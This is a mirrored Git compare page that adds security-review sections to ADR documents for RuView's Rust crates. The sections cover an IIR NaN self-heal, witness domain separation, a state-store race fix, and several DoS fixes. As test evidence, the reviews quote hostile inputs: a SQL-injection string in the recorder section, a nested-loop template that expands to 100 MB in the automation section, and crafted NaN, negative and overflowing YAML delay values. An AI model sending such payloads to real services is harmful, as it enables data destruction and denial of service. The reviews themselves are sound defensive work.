mirror of
https://github.com/ruvnet/RuView
synced 2026-06-15 11:13:20 +00:00
Compare commits
16 Commits
| SHA1 |
|---|
| 90a88ada9a |
| cfd0ad76cf |
| 71e8756051 |
| 5287497a4a |
| bf1dfe79fd |
| 9b126e927e |
| 41bee64593 |
| 5bc3b634b7 |
| e1f4897269 |
| 9f80b66ae3 |
| 02cb84e0bb |
| ebfaee4437 |
| db3d94a313 |
| a369fbe66e |
| d2089c342a |
| 306d009e72 |
@@ -1092,6 +1092,12 @@ Two robustness bugs were fixed in the on-device edge path (`firmware/esp32-csi-n

Both are pinned by host-buildable C99 tests in `firmware/esp32-csi-node/test/test_vitals_count_presence.c` (`make run_vitals`). The exact thresholds are documented constants pending on-device calibration against ground truth.

### 2026-06 — Rust `wifi-densepose-vitals`: IIR filter NaN/inf self-heal (ADR-158 §A1)

A correctness/safety review of the Rust extraction crate found a real bug parallel to the firmware robustness class above. The 2nd-order resonator `bandpass_filter` in both `breathing.rs` and `heartrate.rs` latches each output `y[n]` into its filter state (`y1`/`y2`). A single non-finite amplitude residual from a corrupt CSI frame produced a NaN `output` that was written into the state; the existing `extract()` `is_finite()` guard dropped that one sample from the history buffer **but never sanitized the poisoned filter state**, so every later output stayed NaN, was rejected too, and the sliding-window history never refilled — breathing **and** heart-rate extraction went silently dead (returning `None` forever) until `reset()`. On the alert path this is a safety-relevant denial of service (one bad frame stops vitals monitoring with no error surfaced).
Fix: when `bandpass_filter` computes a non-finite `output`, it resets the IIR state to default and returns `0.0`, so the resonator self-heals on the next clean frame (the `0.0` is still dropped by the caller's finite-check, so no spurious sample enters history). Same shape as the calibration NaN bug (ADR-154 §3) — the prior hardening guarded the *history boundary* but not the *filter-state boundary*. Pinned by `breathing::tests::nan_frame_does_not_permanently_poison_filter`, `breathing::tests::inf_mid_stream_does_not_freeze_history`, and `heartrate::tests::nan_frame_does_not_permanently_poison_filter` (all FAIL pre-fix, verified by reverting). The review also de-magicked the HR physiological plausibility band into named `HR_PLAUSIBLE_MIN_BPM`/`HR_PLAUSIBLE_MAX_BPM` consts (value-identical 40/180 BPM) and added a fabricated-vital negative (`pure_noise_is_never_reported_valid` — broadband noise never yields a clinically `Valid` HR; the extractor honestly returns low-confidence `Unreliable`). Clean dimensions confirmed with evidence: flat/silent input → `None`; pure noise → low-confidence `Unreliable`, never `Valid`; harmonic-rich breathing with no cardiac component → low-confidence, not a confident false HR; out-of-band BPM rejected by the plausibility clamp.
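
The self-heal described above can be sketched as follows. This is a minimal illustration, not the crate's code: the struct names, the `f64` sample type, and the coefficient layout are assumptions; only the behaviour (reset the state and return `0.0` on a non-finite output) comes from the text.

```rust
/// State of a 2nd-order IIR resonator (field names are illustrative).
#[derive(Debug, Default, Clone, Copy, PartialEq)]
struct IirState {
    x1: f64,
    x2: f64,
    y1: f64,
    y2: f64,
}

/// Hypothetical band-pass biquad coefficients.
#[derive(Debug, Clone, Copy)]
struct Coeffs {
    b0: f64,
    b2: f64,
    a1: f64,
    a2: f64,
}

/// One filter step: y[n] = b0*x[n] + b2*x[n-2] - a1*y[n-1] - a2*y[n-2].
/// A non-finite output is never latched into the state: the state is
/// reset to default and 0.0 is returned, so the next clean sample is
/// filtered from a clean state.
fn bandpass_step(state: &mut IirState, c: &Coeffs, input: f64) -> f64 {
    let output = c.b0 * input + c.b2 * state.x2 - c.a1 * state.y1 - c.a2 * state.y2;
    if !output.is_finite() {
        *state = IirState::default();
        return 0.0;
    }
    state.x2 = state.x1;
    state.x1 = input;
    state.y2 = state.y1;
    state.y1 = output;
    output
}
```

Without the reset branch, a single NaN input would be stored in `y1` and every later output would stay NaN, which is the failure mode the pinned tests guard against.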

## References

- Ramsauer et al. (2020). "Hopfield Networks is All You Need." ICLR 2021. (ModernHopfield formulation)

@@ -104,6 +104,57 @@ Ranked by build cost × user impact:
| **P9** | HACS integration repo (`hass-wifi-densepose`) for HA-side install path | pending |
| **P10** | Witness bundle + CSA-style spec compliance check | pending |

## 4.1 Crypto/security review notes (§2.2 witness chain — ADR-262 P2 prerequisite)

Beyond-SOTA crypto+security review of the SHA-256 + Ed25519 witness chain
(`witness.rs` / `witness_signing.rs`) and the manifest signature surface
(`manifest.rs`), because ADR-262 P2 proposes to **reuse this exact signing
chain**. Top priority was the sibling `wifi-densepose-engine` bug class —
unframed boundary-to-boundary concatenation of operator-influenceable strings
into a signed/hashed digest.

- **Engine bug class ABSENT (good result, reported with byte evidence).**
  `canonical_bytes` is `DOMAIN_TAG ‖ prev_hash[32] ‖ seq:u64-be ‖ ts:u64-be ‖
  kind_len:u32-be ‖ kind ‖ payload_len:u32-be ‖ payload`. The two
  variable-length operator-influenceable fields (`kind`, `payload`) are
  **length-prefixed**; the fixed-width fields are self-delimiting → the
  encoding is injective (no two distinct event tuples share a preimage). The
  Ed25519 signature signs the **identical** bytes the SHA-256 chain commits to.
  No separate unframed concatenation exists; the manifest `binary_signature`
  is signed at build time (Makefile) over a single fixed-length `binary_sha256`
  hex value, not in-crate.

- **CHM-WIT-01 (FIXED) — domain-separation tag added.** The engine fix
  prescribed *domain-tag + length-prefix*; length-prefix was present, the
  domain tag was not. Added a versioned, NUL-terminated
  `WITNESS_DOMAIN_TAG = b"cog-ha-matter/witness-event/v1\x00"` prefix so the
  witness message can never be replayed as a message for another Ed25519
  context that shares key infrastructure (notably the manifest signature).
  **Witness bytes change by design** (prior on-disk hashes/signatures
  invalidated, as with the engine fix); verified safe because no in-repo crate
  consumes cog-ha-matter witness bytes programmatically (doc-mentions only).

- **CHM-WIT-02 (HARDENED) — `verify_signature` now uses `verify_strict`.** For
  an audit chain the signature is the attestation, so non-canonical encodings
  and small-order keys are rejected (RFC 8032 strict), giving the "one
  canonical signature per event" property. Not a forgery fix — the verifying
  key is caller-pinned, never read from the event.

- **Confirmed clean (with evidence):** verify-before-trust + key-pinning
  (`verify_signature` takes the verifying key as a parameter; `read_jsonl`
  re-derives every hash and chain-verifies); key handling (the crate never
  generates/stores/logs/serializes a signing key — only a documented test-only
  fixed seed; production keys come from the Seed secure store, out of scope);
  determinism (positional bytes, deterministic Ed25519, alphabetically-locked
  JSONL field order, sorted TXT records — no HashMap/float nondeterminism feeds
  any digest); fail-closed parsing (structured errors, no panics; `main.rs`
  reads no untrusted files/paths).
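
The canonical layout listed in the first bullet can be sketched with the standard library alone. The tag value and field order are taken from the notes above; the function signature, the `Option` return for oversized fields, and the omission of the SHA-256 and Ed25519 steps are assumptions made to keep the example self-contained.

```rust
/// Domain tag as quoted in the review notes (versioned, NUL-terminated).
const WITNESS_DOMAIN_TAG: &[u8] = b"cog-ha-matter/witness-event/v1\x00";

/// Builds DOMAIN_TAG ‖ prev_hash[32] ‖ seq:u64-be ‖ ts:u64-be ‖
/// kind_len:u32-be ‖ kind ‖ payload_len:u32-be ‖ payload.
/// Returns None if a variable-length field does not fit a u32 length prefix.
fn canonical_bytes(
    prev_hash: &[u8; 32],
    seq: u64,
    ts: u64,
    kind: &str,
    payload: &[u8],
) -> Option<Vec<u8>> {
    let kind_len = u32::try_from(kind.len()).ok()?;
    let payload_len = u32::try_from(payload.len()).ok()?;

    let mut out = Vec::new();
    out.extend_from_slice(WITNESS_DOMAIN_TAG);
    out.extend_from_slice(prev_hash);
    out.extend_from_slice(&seq.to_be_bytes());
    out.extend_from_slice(&ts.to_be_bytes());
    // Length prefixes make the two variable-length fields self-delimiting.
    out.extend_from_slice(&kind_len.to_be_bytes());
    out.extend_from_slice(kind.as_bytes());
    out.extend_from_slice(&payload_len.to_be_bytes());
    out.extend_from_slice(payload);
    Some(out)
}
```

Because each variable-length field carries its own length, moving a byte from `payload` into `kind` changes the encoded bytes, which is the injectivity property the review relies on.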

Tests: `cog-ha-matter --no-default-features` 64 → **68**, 0 failed (CHM-WIT-01
pinned by 4 fails-on-old tests across `witness.rs`/`witness_signing.rs`;
CHM-WIT-02 guarded by a key-pinning test). Python deterministic proof
unchanged (cog-ha-matter is off the signal proof path).

## 5. References

- ADR-101 — `cog-pose-estimation` packaging precedent (signed binaries on GCS, .cog manifest)

@@ -190,4 +190,78 @@ The entity registry is a `RwLock<HashMap<EntityId, EntityEntry>>` backed by an a

- `v2/crates/wifi-densepose-sensing-server/src/main.rs` — Axum + Tokio architecture pattern used throughout the existing server stack
- `docs/adr/ADR-126-ruview-native-ha-port-master.md` — HOMECORE master; §5.5 crate naming; §6 compatibility contract; §5.1 RUVIEW-POLICY

---

## 9. Security & concurrency review (P1 core, beyond-SOTA sweep)

Foundational review of the `homecore` crate — the state store + event bus +
service/entity registries every other HOMECORE module trusts. Same rigor as
the ADR-129/130/132/133/161 sibling reviews. **Three real fixes (one
concurrency, two hardening), each pinned by a fails-on-old test; the bus-lag
and lock-discipline dimensions confirmed clean with evidence.**

- **HC-RACE-01 (state-set TOCTOU — lost / reordered `state_changed`, the
  crux). FIXED.** `StateMachine::set` did `get()` (releasing the DashMap
  shard lock) → compute the next snapshot + the no-op / `last_changed`
  decision → `insert()` (re-acquiring the lock) → `send()`. The
  read-modify-write was **not atomic** w.r.t. a concurrent writer on the
  same entity, contradicting §2.1's promise that "the writer atomically
  replaces the map entry." A writer that read a stale `old` could
  mis-classify a genuine transition as a no-op and **drop its
  `state_changed` event** (a missed automation trigger) or fire an event
  whose `new_state` duplicated the previously delivered one (a spurious
  trigger for any automation keyed on `old_state != new_state`). **Fix:**
  hold the shard write-lock across the entire read→decide→insert→fire
  sequence via `entry()`/`insert_entry()`; `tx.send` is non-blocking,
  non-async, and never re-enters the map, so firing under the shard lock
  cannot deadlock and keeps global event order in lock-step with global
  commit order. Pinned by `concurrent_set_fires_no_duplicate_adjacent_events`
  (4 writers toggling one entity A/B; asserts no two consecutive fired
  events carry an identical `new_state` — impossible under correct
  serialisation; a probe observed ~93k such duplicate-adjacent events across
  200 trials on the racy code, zero on the fix).
- **HC-EID-LEN-01 (unbounded `entity_id` — memory-DoS at the REST boundary).
  FIXED.** `homecore-api/src/rest.rs` parses untrusted path segments
  straight through `EntityId::parse`; with no length cap, an
  otherwise-valid id (`a.` + many MB of `[a-z0-9_]`) was accepted and a
  `POST /api/states/<giant>` would persist it into the DashMap state store
  (permanent growth across distinct ids). **Fix:** reject ids longer than
  `MAX_ENTITY_ID_LEN` (255, HA-compatible) up front in `parse()`, before any
  per-char scan, with a new `EntityIdError::TooLong`; fail-closed at the
  boundary type protects every caller. Pinned by `entity_id_length_boundary`
  (exactly-MAX accepted, MAX+1 and a 4 MiB id rejected — fails on old code).
- **HC-SVC-PANIC-01 (service-handler panic not isolated). HARDENED.**
  `ServiceRegistry::call` already ran handlers outside the registry lock (no
  `RwLock` poisoning, no blocking of other callers — clean), but a
  panicking handler unwound through `call()` into the caller's task. **Fix:**
  wrap the handler future in `AssertUnwindSafe` + `catch_unwind`, converting
  a panic to `ServiceError::HandlerPanicked`; the registry stays fully
  usable. Pinned by `panicking_handler_is_isolated_and_registry_survives`.
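
The HC-RACE-01 fix pattern (one lock held across read, decide, insert, and fire) can be illustrated with a standard-library stand-in. This sketch does not use DashMap or `tokio::sync::broadcast`: a `Mutex<HashMap>` replaces the shard lock and `std::sync::mpsc` replaces the broadcast channel, and all type and field names are hypothetical.

```rust
use std::collections::HashMap;
use std::sync::mpsc::Sender;
use std::sync::Mutex;

#[derive(Debug, Clone, PartialEq)]
struct StateChanged {
    entity_id: String,
    old_state: Option<String>,
    new_state: String,
}

struct Inner {
    states: HashMap<String, String>,
    tx: Sender<StateChanged>,
}

struct StateMachine {
    inner: Mutex<Inner>,
}

impl StateMachine {
    fn new(tx: Sender<StateChanged>) -> Self {
        Self { inner: Mutex::new(Inner { states: HashMap::new(), tx }) }
    }

    /// Returns true when a `state_changed` event was fired.
    fn set(&self, entity_id: &str, new_state: &str) -> bool {
        // The guard lives until the end of the function, so no other
        // writer can interleave between the read, the no-op decision,
        // the insert, and the send.
        let mut inner = self.inner.lock().unwrap();
        let old = inner.states.get(entity_id).cloned();
        if old.as_deref() == Some(new_state) {
            return false; // genuine no-op: nothing changed
        }
        inner.states.insert(entity_id.to_string(), new_state.to_string());
        // Sending on an unbounded mpsc channel does not block and does
        // not touch the map, so firing under the lock cannot deadlock.
        let _ = inner.tx.send(StateChanged {
            entity_id: entity_id.to_string(),
            old_state: old,
            new_state: new_state.to_string(),
        });
        true
    }
}
```

With this shape, event order equals commit order, so two consecutive events for one entity can never carry the same `new_state`.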

**Dimensions confirmed clean (with evidence):**

- **Event-bus bounds / lag (same class as the homecore-api WS lag-DoS).**
  Both `StateMachine` and `EventBus` use bounded `tokio::sync::broadcast`
  (capacity 4,096). A slow subscriber gets a recoverable `Lagged(n)`
  (drop-oldest + re-sync); `fire_*` is non-blocking and **never waits on
  slow receivers**, so a lagging subscriber cannot block the publisher, grow
  the channel without bound, or take down a fast subscriber. Evidenced by
  `slow_subscriber_does_not_block_publisher_or_kill_the_bus` (fire 3×
  capacity at an idle subscriber; publisher unblocked, bus stays live).
- **Lock ordering / lock-across-await (deadlock).** No code path holds two
  of `{state DashMap, registry RwLock, service RwLock}` simultaneously, so
  no inconsistent-ordering deadlock can exist. Every `tokio::sync::RwLock`
  guard in `registry.rs`/`service.rs` is used in a single synchronous
  statement and dropped before any `.await`; `call` explicitly scopes the
  read guard out before awaiting the handler. The only guard held across a
  send is the DashMap shard lock in `set`, across a synchronous
  (non-await) broadcast send — safe.
- **Panic-on-input.** No reachable `unwrap`/`expect`/index in non-test code
  beyond the safe `send().unwrap_or(0)` and the dead-but-harmless
  `split_once(...).unwrap_or(...)` fallbacks on already-validated ids.

`cargo test -p homecore --no-default-features`: **20 → 24 passed, 0 failed**
(+4 pins). Workspace green; Python deterministic proof unchanged
(`f8e76f21…46f7a`, bit-exact — `homecore` is off the signal proof path).
- `docs/adr/ADR-028-esp32-capability-audit.md` — witness chain pattern (Ed25519 per state transition)

@@ -190,6 +190,23 @@ This is the same Wasmtime host already used for integration plugins (ADR-128)

---

## 8a. Security review (beyond-SOTA sweep, post ADR-154–159)

A focused security review of `homecore-automation` (the execution/eval surface — triggers → conditions → actions, with templates) was run after the ADR-154–159 sweep, applying the same rigor that the sibling engine/bfld/calibration/vitals/geo reviews used. **Two real DoS findings, each pinned by a fails-on-old test; the condition-bypass, fail-closed-parsing, and action-authorization dimensions were probed and found clean.**
- **HC-SEC-01 (template-injection / unbounded-expansion DoS, HIGH) — FIXED.** A `template:` condition / `value_template` is user automation config, and was rendered with MiniJinja's defaults: **no instruction budget, no output cap**. A single condition such as `{% for i in range(5000) %}{% for j in range(5000) %}xxxx{% endfor %}{% endfor %}` rendered a **100 MB string over ~11 s on one render call** (measured) — a CPU/memory denial of service (the bfld-class "unbounded expansion"; MiniJinja's per-call `range()` 10k cap does **not** stop nested loops). **Fix:** enable MiniJinja's `fuel` feature and set a per-render budget (`set_fuel(Some(1_000_000))`) so a nested loop burns one unit per iteration — the attack now fails fast (~90 ms) with "engine ran out of fuel"; plus a 64 KiB source-length cap rejecting pathological sources before compilation. Legitimate HA templates (a few dozen instructions) are unaffected. Pinned by `nested_loop_template_is_bounded_not_unbounded_dos`, `single_huge_repeat_template_is_bounded`, `oversized_template_source_is_rejected` (all fail-on-old: unbounded render / no rejection), and `legitimate_template_still_renders_within_fuel` (no regression).
- **HC-SEC-02 (panic-on-config DoS, MEDIUM) — FIXED.** `Action::Delay { seconds }` and `Action::WaitForTrigger { timeout_seconds }` fed the user-supplied float straight into `Duration::from_secs_f64`, which **panics** on negative, NaN, infinite, or overflowing inputs — all reachable from a crafted (or typo'd) YAML (`delay: {seconds: -1}`, `.nan`, `.inf`, `1e308`). One hostile config aborts the spawned automation run task with a panic (measured: "cannot convert float seconds to Duration: value is negative"). **Fix:** a `safe_duration_from_secs` guard that saturates instead of panicking (NaN/±inf/negative → `Duration::ZERO`, matching HA's lenient "non-positive delay = no delay"; absurdly large → clamped to ~100 years). Pinned by `delay_negative_seconds_does_not_panic`, `delay_nan_seconds_does_not_panic`, `delay_infinite_seconds_does_not_panic`, `wait_for_trigger_negative_timeout_does_not_panic`, `safe_duration_saturates_hostile_values` (incl. overflow clamp).
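
The saturating guard described for HC-SEC-02 can be sketched as below. The function name and the mapping (NaN, ±inf, and non-positive values to `Duration::ZERO`; very large values clamped to roughly 100 years) follow the text; the constant name and its exact value are assumptions.

```rust
use std::time::Duration;

/// Upper clamp of roughly 100 years in seconds (illustrative value).
const MAX_DELAY_SECS: f64 = 100.0 * 365.0 * 24.0 * 3600.0;

/// Converts user-supplied float seconds into a Duration without ever
/// reaching the panicking branches of `Duration::from_secs_f64`.
fn safe_duration_from_secs(secs: f64) -> Duration {
    // NaN, +inf, -inf, zero and negatives all mean "no delay".
    if !secs.is_finite() || secs <= 0.0 {
        return Duration::ZERO;
    }
    // The value is now finite and positive; clamp it so the conversion
    // cannot overflow.
    Duration::from_secs_f64(secs.min(MAX_DELAY_SECS))
}
```

For example, `safe_duration_from_secs(-1.0)` yields a zero delay instead of panicking, and `safe_duration_from_secs(1e308)` yields the clamp value.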

**Dimensions confirmed clean (with evidence):**
- **Condition bypass / fail-closed eval** — a `Condition::Template` whose render errors evaluates to `false` (`condition.rs` `Err(_) => false`), and a `Choose` branch condition that fails to deserialize is treated as **non-matching** (the branch is skipped), not silently passing (`action.rs` `ChoiceBranch::matches` `Err(_) => return false`). Both fail **closed** (do-not-run), confirmed by the existing `choose_*` tests and template-false-blocks-action behavioral test. No true-by-default-on-parse-error path found.
- **Re-entrancy / livelock (DoS)** — run-mode machinery is bounded and tested: `Single`/`IgnoreFirst` re-entrancy guard, `Restart` cancel-and-replace, `Queued` FIFO serialization, and `max: N` semaphore cap (ADR-162; `restart_mode_cancels_prior_run`, `queued_mode_runs_sequentially_not_concurrently`, `max_two_caps_concurrency_at_two`, `single_mode_does_not_double_fire_on_rapid_triggers`). A self-triggering automation does not livelock the engine — each fire is bounded by its run-mode.
- **Action authorization** — templates are read-only sandboxed (`states`/`state_attr`/`is_state`/`now` globals; no service-call or state-set global is exposed to template scope), so a template cannot escalate into an action. Service authorization itself is enforced at the `homecore` service-registry boundary (out of this crate's scope); no gap found in what the automation crate enforces.
- **Panic-on-config (parse)** — `serde_yaml`/`serde_json` deserialization returns structured `AutomationError` (no `unwrap`/`expect`/index reachable from a crafted config in the eval/exec path); the only remaining panic surface was the `from_secs_f64` path fixed as HC-SEC-02.
Validation: `cargo test -p homecore-automation --no-default-features` → 54 passed / 0 failed (+14 over baseline). Python deterministic proof unchanged (homecore-automation is off the signal-processing proof path).

---

## 9. References

### HA upstream

@@ -120,6 +120,42 @@ tested; P3 is planned.
HOMECORE-API (ADR-130, P3); automation conditions on historical state are
HOMECORE-automation (ADR-129, P3).

## 3a. Security review (2026-06, post-ADR-154–159 sweep)

A beyond-SOTA security review of `homecore-recorder` covered SQL injection, retention/purge
correctness, fail-closed write integrity, semantic-store NaN poisoning, and PII exposure.

**Confirmed clean (with evidence):**

- **SQL injection — clean.** Every query in `db.rs` uses bound `?` parameters; no user- or
  entity-influenceable value is interpolated into SQL via `format!`/concatenation. The only
  `format!` builds the `LIKE` *pattern* string, which is itself **bound** as a parameter with
  `ESCAPE '\\'` and `% _ \` escaping — so a metacharacter payload is matched literally. Pinned
  by `malicious_entity_id_is_stored_literally_not_executed` (a `'; DROP TABLE states; --` state
  value leaves the table intact and round-trips verbatim) and
  `like_metacharacters_in_query_are_literal_not_wildcards`.
- **NaN-index poisoning — structurally impossible.** Embeddings are SHA-256 → `i32` →
  `f32`; an `i32`→`f32` cast is always finite (never NaN/Inf), and an all-zero-digest is
  guarded by the `norm > 1e-10` check. Empty-index search, empty-string query, and `k=0` were
  probed and all return `Ok(0)` with no panic. (Unlike the calibration/vitals/geo paths, no raw
  sensor float ever reaches the index.)
- **Fail-closed writes.** A removal event returns `Ok(None)`; semantic-index failure is logged,
  not propagated, so it never blocks the durable SQLite write; `EntityId` parse failure falls
  back to a sentinel rather than panicking.
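
The `LIKE` pattern handling mentioned in the first bullet can be sketched as follows. The helper names are hypothetical; the escaped characters (`%`, `_`, `\`) and the idea that the finished pattern is bound as a parameter rather than spliced into SQL come from the text.

```rust
/// Escapes LIKE metacharacters so the input matches literally when the
/// query declares a backslash ESCAPE character.
fn escape_like(input: &str) -> String {
    let mut out = String::with_capacity(input.len());
    for ch in input.chars() {
        if matches!(ch, '%' | '_' | '\\') {
            out.push('\\');
        }
        out.push(ch);
    }
    out
}

/// Builds a "contains" pattern. The result is meant to be passed as a
/// bound `?` parameter, never interpolated into the SQL text itself.
fn contains_pattern(input: &str) -> String {
    format!("%{}%", escape_like(input))
}
```

A quote-laden payload passes through unchanged because quoting is handled by parameter binding; only the three `LIKE` metacharacters need escaping here.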

**Fixed (real bounding bugs):**

- **Memory-DoS — `get_state_history` was unbounded.** No `LIMIT`, so a wide time window over a
  high-frequency entity loaded an unbounded row set into memory. Now capped at
  `MAX_HISTORY_ROWS` (1,000,000); sibling search paths were already `k`-bounded.
- **Disk-DoS / documented-but-missing `purge`.** The README advertised `Recorder::purge`, but
  no retention path existed → unbounded disk growth. Added a **transactional** `purge(older_than)`
  with an **exclusive** cutoff (idempotent, no off-by-one) that deletes old `states`/`events` and
  GCs orphaned `state_attributes` blobs (dedup-shared blobs kept until their last referrer is gone).

`homecore-recorder` tests: 19 → 25 (`--no-default-features`) / 25 → 31 (`--features ruvector`),
0 failed. Python deterministic proof unchanged (recorder is off the signal proof path).

## 4. Links

- Crate: `v2/crates/homecore-recorder/` — `Cargo.toml`, `README.md`, `src/lib.rs`,

@@ -174,3 +174,71 @@ vs. an in-memory array at compile time), which intersects with ADR-084 (RabitQ)
| **P1** (this ADR) | `intent`, `recognizer` (regex), `handler` (5 built-ins), `runner` (trait + noop), `pipeline` (end-to-end wiring), 10–15 tests |
| **P2** | Real `tokio::process::Child` runner with Windows-safe teardown; `SemanticIntentRecognizer` with ruvector HNSW |
| **P3** | STT/TTS bridge, satellite protocol, cloud fallback |

---

## 6. Security review (beyond-SOTA, untrusted-input → action path)

A focused security review of the Assist pipeline — `utterance → recognizer →
intent → handler → action`, plus `RufloRunner` — treating the utterance as
untrusted input (voice transcripts, the WebSocket `assist` command). This
surface was not covered by the ADR-154–159 sweep.

### 6.1 Finding fixed — HC-ASSIST-01 (unbounded-utterance DoS, LOW)

Both `RegexIntentRecognizer::recognize` and the semantic `recognize_scored`
accepted utterances of **unbounded length** and ran `to_lowercase()` (a full
clone) + a per-registered-pattern scan (and, in the semantic path, full
tokenisation + feature-hash embedding) before any bound — an allocation/CPU
amplification on attacker-controlled input. The `regex` crate is **linear-time**
(RE2-style finite automaton, no catastrophic backtracking), so this was a
throughput/memory DoS, not a hang.

**Fix:** `MAX_UTTERANCE_BYTES = 4096` (far above any real spoken command),
checked at **both** recognizer boundaries *before* any allocation/scan. An
over-length utterance **fails closed** to `Ok(None)` — no intent, no action,
identical to an unrecognised phrase — so it can never be coerced into firing a
handler. Pinned by `over_length_utterance_fails_closed` (an over-length
utterance that *contains* a valid command resolves to `None`, which would have
matched on the old code) and `over_length_utterance_fails_closed_semantic`.
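
A minimal sketch of the length gate, assuming a toy recognizer: the constant and the fail-closed `Ok(None)` result come from the text, while the function shape, the `String` error type, and the single hard-coded `turn on` pattern (a stand-in for the registered regex patterns) are illustrative.

```rust
/// Upper bound on utterance size, as stated in the review notes.
const MAX_UTTERANCE_BYTES: usize = 4096;

/// Toy recognizer: returns an intent name, or Ok(None) when nothing
/// matches. Over-length input is rejected before any allocation.
fn recognize(utterance: &str) -> Result<Option<&'static str>, String> {
    // `len()` is the byte length and costs O(1); the check runs before
    // the lowercase clone and before any pattern scan.
    if utterance.len() > MAX_UTTERANCE_BYTES {
        return Ok(None); // fail closed: same result as "not understood"
    }
    let lowered = utterance.to_lowercase();
    // Unanchored match, standing in for the pattern scan.
    if lowered.contains("turn on ") {
        return Ok(Some("turn_on"));
    }
    Ok(None)
}
```

An over-length utterance that embeds a valid command therefore resolves to no intent, exactly like an unrecognised phrase.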

### 6.2 Dimensions confirmed clean (with evidence)

- **Command / argument injection — NO SUBPROCESS SURFACE.** The `RufloRunner`
  has exactly two impls: `NoopRunner` (no process) and `LocalRunner` (runs the
  local recognizer, no process). There is **no** `std::process` / `tokio::process`
  / `Command` / process `.spawn()` anywhere in the crate — the trait `spawn` is
  only a `started: bool` lifecycle flag — and `RufloRunnerOpts.{script_path,env}`
  are **inert data, never consumed**. The live `node ruflo-agent.js` runner is
  genuinely data-gated/future (P2). Defence-in-depth: the `entity_id` capture
  class `[a-z_][a-z0-9_ .]*` **excludes every shell/SQL metacharacter**, so even
  when an injection-shaped utterance resolves (the regex is not exact-anchored),
  the captured slot is a clean token — sanitisation by construction. Pins:
  `shell_metachars_never_survive_into_a_resolved_slot`,
  `runner_opts_are_inert_no_process_spawned`,
  `pipeline_injection_shaped_utterance_carries_no_metachars_to_service`.
- **ReDoS — STRUCTURALLY IMPOSSIBLE.** `regex 1.12.3` (no `fancy-regex` in the
  dependency tree) is linear-time; a classic `(a+)+$` shape on adversarial input
  completes in bounded time. Pin:
  `pathological_backtracking_pattern_completes_in_bounded_time`. Patterns are
  operator-registered, not user-supplied, in any case.
- **NaN-poisoning — EMBEDDINGS STRUCTURALLY FINITE.** The embedding path takes
  only `&str` and produces values via FNV feature-hashing + a guarded L2
  normalise (`norm > 1e-12`); no external float input, no unguarded division, so
  a crafted utterance cannot inject NaN/Inf to poison the cosine k-NN. Cosine
  against the zero vector is a finite `0.0`; an empty index `max_by` returns
  `None` (no panic); the NaN-safe `partial_cmp().unwrap_or(Equal)` is already in
  place. Pins: `embeddings_are_structurally_finite`,
  `cosine_with_zero_vector_is_finite_not_nan`,
  `empty_utterance_against_empty_index_no_panic_no_match`.
- **Intent confusion / fail-closed.** An unrecognised utterance → `not_understood()`
  (no service call); a recognised intent with no registered handler →
  `not_understood()`; semantic below-threshold / empty-index → regex fallback.
  No default high-privilege intent, no fail-open path.
- **Panic-on-input.** No `unwrap`/`expect`/index reachable from a crafted
  utterance; the one `exemplars[id]` index uses an `id` from `enumerate()` over
  the append-only exemplar `Vec` (no remove API), so it is always in bounds.

`cargo test -p homecore-assist --no-default-features`: **29→36, 0 failed** (+7);
default/`semantic`: **39→48, 0 failed** (+9). Python deterministic proof
unchanged (homecore-assist is off the signal proof path).

@@ -495,3 +495,34 @@ Rejected. `ViewpointFusionEvent` (viewpoint/fusion.rs lines 183–219) is an int
**Integration glue -- not yet on the live path:** emission of `CalibrationIdMismatch` / `DriftProfileConflict` / `PhaseAlignmentFailed` once `calibration_id` propagation and the phase-align convergence signal are threaded onto frames; the BFLD witness record emitted on privacy demotion.

**Trust contribution:** sensor *agreement made explicit* -- fusion records the evidence it relied on, and any disagreement automatically tightens the downstream privacy class.

---

## Witness Integrity Review (2026-06-14) — domain-separation fix

A beyond-SOTA security review of `wifi-densepose-engine` (the composition root
that builds the §2.7 trust witness in `witness_of`) found a real **witness
domain-separation gap**, now fixed.

**Finding (witness-gap, HIGH).** `witness_of` concatenated `model_version`,
`calibration_version`, and `privacy_decision` boundary-to-boundary, and the
variable-length `evidence` list carried no explicit count. A string straddling a
field boundary therefore collided with a *different* trust decision —
e.g. a per-room adapter id (ADR-150 §3.4, operator-influenceable) that absorbs
the leading bytes of the calibration epoch (`model="…cal:00a"`, `cal="b"`)
produces the **same** witness as `model="…"`, `cal="cal:00ab"`. Two distinct
privacy-relevant input tuples → one witness defeats the "any privacy-relevant
delta → different witness" guarantee this ADR's §2.7 witness exists to provide.

**Fix.** The witness now (a) prepends a domain tag `ruview.engine.witness.v1`,
(b) writes an explicit 8-byte evidence count, and (c) **length-prefixes every
field** (8-byte LE length ‖ bytes), so field framing is unambiguous regardless
of contents. This is a witness-layout change (all prior witness bytes are
invalidated by design); downstream consumers only assert witness *relationships*
(`assert_ne`/`assert_eq` across runs), not absolute bytes, so nothing breaks.

Pinned by `witness_distinguishes_model_calibration_boundary` and
`witness_distinguishes_evidence_model_boundary` (both fail on the old
concatenation). Witness **determinism** was reviewed and confirmed clean: no
HashMap iteration and no float formatting feed the hash (floats appear only in
the `SemanticState` statement, which is outside the witness).
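
The boundary collision and the framing fix can be reproduced on the hash preimage alone. In this sketch the hash step is omitted (the standard library has no SHA-256), the field order and function names are assumptions, and only the domain tag, the 8-byte little-endian length prefix, and the 8-byte evidence count are taken from the text.

```rust
/// Domain tag named in the fix description.
const DOMAIN_TAG: &[u8] = b"ruview.engine.witness.v1";

/// Old shape: fields concatenated boundary-to-boundary.
fn unframed(model: &str, cal: &str, privacy: &str) -> Vec<u8> {
    [model, cal, privacy].concat().into_bytes()
}

/// Appends an 8-byte little-endian length followed by the field bytes.
fn push_field(out: &mut Vec<u8>, field: &[u8]) {
    out.extend_from_slice(&(field.len() as u64).to_le_bytes());
    out.extend_from_slice(field);
}

/// New shape: domain tag, length-prefixed fields, explicit evidence count.
fn framed(model: &str, cal: &str, privacy: &str, evidence: &[&str]) -> Vec<u8> {
    let mut out = Vec::new();
    out.extend_from_slice(DOMAIN_TAG);
    push_field(&mut out, model.as_bytes());
    push_field(&mut out, cal.as_bytes());
    push_field(&mut out, privacy.as_bytes());
    out.extend_from_slice(&(evidence.len() as u64).to_le_bytes());
    for item in evidence {
        push_field(&mut out, item.as_bytes());
    }
    out
}
```

With the unframed shape, `("m-cal:00a", "b")` and `("m-", "cal:00ab")` yield identical bytes; with the framed shape they differ, as do the evidence lists `["ab"]` and `["a", "b"]`.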
@@ -599,3 +599,53 @@ Per ADR-028/ADR-010, three rows are added to the witness log:
**Integration glue -- not yet on the live path:** wiring the registry into `PrivacyGate` class transitions, the MQTT discovery payload, and a read-only Home Assistant diagnostic entity exposing the active mode + proof hash.

